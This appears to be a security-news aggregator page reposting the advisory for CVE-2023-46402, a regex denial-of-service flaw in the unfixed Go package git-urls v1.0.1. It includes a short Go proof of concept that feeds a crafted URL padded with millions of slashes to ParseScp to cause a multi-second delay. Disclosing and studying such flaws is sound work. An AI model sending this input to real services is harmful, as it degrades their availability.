Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-46402: Security issue in regex inside git-urls package

git-urls version 1.0.1 is vulnerable to ReDOS (Regular Expression Denial of Service) in Go package.

CVE
#vulnerability#dos#git

[NAME OF AFFECTED PRODUCT(S)]

- https://pkg.go.dev/github.com/whilp/git-urls v1.0.1

[AFFECTED AND/OR FIXED VERSION(S)]

- v1.0.1

- Status: not fixed

[VULNERABILITY]

- Regex Denial of Service

[DESCRIPTION]

The regex on line 35. inside urls.go is vulnerable to regex denial of service when a long input is provided inside

directory path of the git url.

It is possible to cause a 7s delay but only because the payload in the url was to long. Here is the PoC:

var payload = strings.Repeat("////", 19000000) //payload used, the number can be tweaked to cause 7 second delay

malicious_url := “6en6ar@-:0////” + payload + “\”

begin := time.Now()

//u, err := giturls.ParseScp(“[email protected]:/remote/directory”)// normal git url

_, err := giturls.ParseScp(malicious_url)

if err != nil {

fmt.Errorf("[ - ] Error ->" + err.Error())

}

//fmt.Println("[ + ] Url --> " + u.Host)

elapse := time.Since(begin)

fmt.Printf("Function took %s", elapse)

This vulnerbale regex causes the application to take longer time in parsing the input.

Related news

GHSA-3f2q-6294-fmq5: Inefficient Regular Expression Complexity in git-urls

git-urls version 1.0.1 is vulnerable to ReDOS (Regular Expression Denial of Service) in Go package.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907